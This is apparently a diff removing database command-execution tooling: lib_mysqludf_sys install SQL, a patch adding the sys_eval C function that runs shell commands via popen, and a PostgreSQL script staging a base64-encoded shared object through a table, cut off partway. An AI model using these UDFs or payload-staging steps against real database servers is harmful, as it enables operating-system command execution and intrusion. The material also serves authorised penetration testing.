-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.dll';

extra/mysqludfsys/lib_mysqludf_sys_0.0.3.patch

@@ -1,354 +0,0 @@
-diff -uN lib_mysqludf_sys_0.0.2/install.sh lib_mysqludf_sys/install.sh
---- lib_mysqludf_sys_0.0.2/install.sh	1970-01-01 01:00:00.000000000 +0100
-+++ lib_mysqludf_sys/install.sh	2009-01-21 00:51:52.000000000 +0000
-@@ -0,0 +1,43 @@
-+#!/bin/bash
-+# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+# Copyright (C) 2007  Roland Bouman 
-+# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+# web: http://www.mysqludf.org/
-+# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-+# 
-+# This library is free software; you can redistribute it and/or
-+# modify it under the terms of the GNU Lesser General Public
-+# License as published by the Free Software Foundation; either
-+# version 2.1 of the License, or (at your option) any later version.
-+# 
-+# This library is distributed in the hope that it will be useful,
-+# but WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+# Lesser General Public License for more details.
-+# 
-+# You should have received a copy of the GNU Lesser General Public
-+# License along with this library; if not, write to the Free Software
-+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+
-+echo "Compiling the MySQL UDF"
-+make
-+
-+if test $? -ne 0; then
-+	echo "ERROR: You need libmysqlclient development software installed "
-+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-+	echo "apt-get install libmysqlclient15-dev"
-+	exit 1
-+else
-+	echo "MySQL UDF compiled successfully"
-+fi
-+
-+echo -e "\nPlease provide your MySQL root password"
-+
-+mysql -u root -p mysql < lib_mysqludf_sys.sql
-+
-+if test $? -ne 0; then
-+	echo "ERROR: unable to install the UDF"
-+	exit 1
-+else
-+	echo "MySQL UDF installed successfully"
-+fi
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys_0.0.2.tar.gz and lib_mysqludf_sys/lib_mysqludf_sys_0.0.2.tar.gz differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c lib_mysqludf_sys/lib_mysqludf_sys.c
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.c	2009-01-21 00:06:13.000000000 +0000
-@@ -1,8 +1,9 @@
- /* 
- 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
- 	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
-+	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+	web: http://www.mysqludf.org/
-+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
- 	
- 	This library is free software; you can redistribute it and/or
- 	modify it under the terms of the GNU Lesser General Public
-@@ -51,7 +52,7 @@
- extern "C" {
- #endif
- 
--#define LIBVERSION "lib_mysqludf_sys version 0.0.2"
-+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
- 
- #ifdef __WIN__
- #define SETENV(name,value)		SetEnvironmentVariable(name,value);
-@@ -139,7 +140,7 @@
- /**
-  * sys_exec
-  * 
-- * executes the argument commandstring.
-+ * executes the argument commandstring and returns its exit status.
-  * Beware that this can be a security hazard.
-  */
- DLLEXP 
-@@ -162,6 +163,34 @@
- ,	char *error
- );
- 
-+/**
-+ * sys_eval
-+ * 
-+ * executes the argument commandstring and returns its standard output.
-+ * Beware that this can be a security hazard.
-+ */
-+DLLEXP 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+);
-+
-+DLLEXP 
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+);
-+
-+DLLEXP 
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+);
-+
- 
- #ifdef	__cplusplus
- }
-@@ -336,5 +365,62 @@
- 	return system(args->args[0]);
- }
- 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+){
-+	unsigned int i=0;
-+	if(args->arg_count == 1
-+	&& args->arg_type[i]==STRING_RESULT){
-+		return 0;
-+	} else {
-+		strcpy(
-+			message
-+		,	"Expected exactly one string type parameter"
-+		);		
-+		return 1;
-+	}
-+}
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+){
-+}
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+){
-+	FILE *pipe;
-+	char line[1024];
-+	unsigned long outlen, linelen;
-+
-+	result = malloc(1);
-+	outlen = 0;
-+
-+	pipe = popen(args->args[0], "r");
-+
-+	while (fgets(line, sizeof(line), pipe) != NULL) {
-+		linelen = strlen(line);
-+		result = realloc(result, outlen + linelen);
-+		strncpy(result + outlen, line, linelen);
-+		outlen = outlen + linelen;
-+	}
-+
-+	pclose(pipe);
-+
-+	if (!(*result) || result == NULL) {
-+		*is_null = 1;
-+	} else {
-+		result[outlen] = 0x00;
-+		*length = strlen(result);
-+	}
-+
-+	return result;
-+}
-+
- 
- #endif /* HAVE_DLOPEN */
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html lib_mysqludf_sys/lib_mysqludf_sys.html
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.html	2009-01-22 10:21:46.000000000 +0000
-@@ -23,7 +23,8 @@
- 		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
- 	</p>
- 	<ol>
--		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and can thus be used to launch an external application.</li>
-+		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-+		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
- 		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
- 		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
- 	</ol>
-@@ -31,6 +32,72 @@
- 		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
- 	</p>
- 	
-+
-+	<a name="sys_eval"></a><h2>sys_eval</h2>
-+	<p>
-+		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-+	</p>
-+	<h3>Syntax</h3>
-+<pre>sys_eval(<b>arg1</b>)</pre>
-+	<h3>Parameters and Return Values</h3>
-+	<dl>
-+		<dt><code><b>arg1</b></code></dt>
-+		<dd>
-+			A command string valid for the current operating system or execution environment.
-+		</dd>
-+		<dt>returns</dt>
-+		<dd>
-+			Whatever output the command pushed to the standard output stream.
-+		</dd>
-+	</dl>
-+	<h3>Installation</h3>
-+	<p>
-+		Place the shared library binary in an appropriate location. 
-+		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-+		Then, create the function using the following DDL statement:
-+	</p>
-+	<pre>
-+CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-+	</pre>
-+	<p>
-+		The function will be globally available in all databases.
-+	</p>
-+	<p>
-+		The deinstall the function, run the following statement:
-+	</p>
-+	<pre>
-+DROP FUNCTION sys_eval;
-+	</pre>
-+	<h3>Examples</h3>
-+	<p>
-+		None yet
-+	</p>
-+	<h3>A Note of Caution</h3>
-+	<p>
-+		Be very careful in deciding whether you need this function. 
-+		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-+		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-+		exposing the function poses a very real security hazard.
-+	</p>
-+	<p>
-+		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-+		The call will be executed with the privileges of the os user that runs MySQL, 
-+		so it is entirely feasible to delete MySQL's data directory, or worse.		
-+	</p>
-+	<p>	
-+		The function is intended for specialized MySQL applications where one needs extended 
-+		control over the operating system. 
-+		Currently, we do not have UDF's for ftp, email and http, 
-+		and this function can be used to implement such functionality in case it is really necessary
-+		(datawarehouse staging areas could be a case in example).
-+	</p>
-+	<p>
-+		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-+	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
-+
- 	<a name="sys_exec"></a><h2>sys_exec</h2>
- 	<p>
- 		<code>sys_exec</code> takes one command string argument and executes it.
-@@ -92,6 +159,9 @@
- 	<p>
- 		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
- 	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
- 	<a name="sys_get"></a><h2>sys_get</h2>
- 	<p>
- 		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.so and lib_mysqludf_sys/lib_mysqludf_sys.so differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql lib_mysqludf_sys/lib_mysqludf_sys.sql
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.sql	2009-01-22 10:21:53.000000000 +0000
-@@ -1,30 +1,33 @@
--/* 
--	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
--	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
--	
--	This library is free software; you can redistribute it and/or
--	modify it under the terms of the GNU Lesser General Public
--	License as published by the Free Software Foundation; either
--	version 2.1 of the License, or (at your option) any later version.
--	
--	This library is distributed in the hope that it will be useful,
--	but WITHOUT ANY WARRANTY; without even the implied warranty of
--	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
--	Lesser General Public License for more details.
--	
--	You should have received a copy of the GNU Lesser General Public
--	License along with this library; if not, write to the Free Software
--	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+/*
-+        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+        Copyright (C) 2007  Roland Bouman
-+        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+        web: http://www.mysqludf.org/
-+        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-+
-+        This library is free software; you can redistribute it and/or
-+        modify it under the terms of the GNU Lesser General Public
-+        License as published by the Free Software Foundation; either
-+        version 2.1 of the License, or (at your option) any later version.
-+
-+        This library is distributed in the hope that it will be useful,
-+        but WITHOUT ANY WARRANTY; without even the implied warranty of
-+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+        Lesser General Public License for more details.
-+
-+        You should have received a copy of the GNU Lesser General Public
-+        License along with this library; if not, write to the Free Software
-+        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
- */
- 
--drop function lib_mysqludf_sys_info;
--drop function sys_get;
--drop function sys_set;
--drop function sys_exec;
-+DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-+DROP FUNCTION IF EXISTS sys_get;
-+DROP FUNCTION IF EXISTS sys_set;
-+DROP FUNCTION IF EXISTS sys_exec;
-+DROP FUNCTION IF EXISTS sys_eval;
- 
--create function lib_mysqludf_sys_info returns string soname 'lib_mysqludf_sys.so';
--create function sys_get returns string soname 'lib_mysqludf_sys.so';
--create function sys_set returns int soname 'lib_mysqludf_sys.so';
--create function sys_exec returns int soname 'lib_mysqludf_sys.so';
-+CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-diff -uN lib_mysqludf_sys_0.0.2/Makefile lib_mysqludf_sys/Makefile
---- lib_mysqludf_sys_0.0.2/Makefile	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/Makefile	2009-01-19 09:11:00.000000000 +0000
-@@ -1,6 +1,4 @@
--linux: \
-- lib_mysqludf_sys.so
-+LIBDIR=/usr/lib
- 
--lib_mysqludf_sys.so: \
-- 
--	gcc -Wall -I/opt/mysql/mysql/include -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-+install:
-+	gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so
-Common subdirectories: lib_mysqludf_sys_0.0.2/.svn and lib_mysqludf_sys/.svn

extra/postgresqludfsys/command_execution/linux.sql

@@ -1,97 +0,0 @@
--- Notes:
--- 
--- The SO compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- SO compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- SO compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- SO compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAAAAkAAHwAAAASAAsAaAAAADoHAADGAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAACjBwAACAAAAAggAAAIAAAAWwcAAAIPAAAZCQAAAg8AAHAHAAACCwAAlQ';
-UPDATE udftest SET data=data||'cAAAILAACNCAAAAgsAAC4JAAACCwAAhQcAAAIKAADaCAAAAgoAAEMJAAACCgAAqwcAAAIBAADwBwAAAgUAABgIAAACBwAAPggAAAIIAABUCAAAAg4AAPEIAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLAMHoAo1w/IPoA4kEJOj8////icONRwSJdCQIiUQkBIkcJOj8////xgQzAMcEJAEAAADo/P///4mF2Pv//8dEJATUCQAAiRwk6Pz///+Jhdz7///HheD7//8AAAAA62GNvfD7//+4AAAAALn/////8q6JyPfQjXD/i53g+///AfOJXCQEi5XY+///iRQk6Pz///+Jhdj7//+JdCQIjYXw+///iUQ';
-UPDATE udftest SET data=data||'kBIuF2Pv//wOF4Pv//4kEJOj8////iZ3g+///i5Xc+///iVQkCMdEJAQABAAAjYXw+///iQQk6Pz///+FwA+Fd////4uV3Pv//4kUJOj8////i4XY+///gDgAdAuLleD7///GRBD/AL7/////i73Y+///uwAAAACJ8YnY8q730YPBA4kMJOj8////iYXU+///i73Y+///ifGJ2PKu99GNDI0MAAAAi5XU+///iQqLvdj7//+J8fKu99GD6QGJ0IPABIlMJAiLldj7//+JVCQEiQQk6Pz///+LhdT7//+LVfBlMxUUAAAAdAXo/P///4HELAQAAFteX13DVYnlg+wYiV30iXX4iX38i1UIi0IQiQQk6Pz///+Jx4sAwegCjXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIwMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
-UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
-UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
--- SO compiled using PostgreSQL 8.2 C libraries
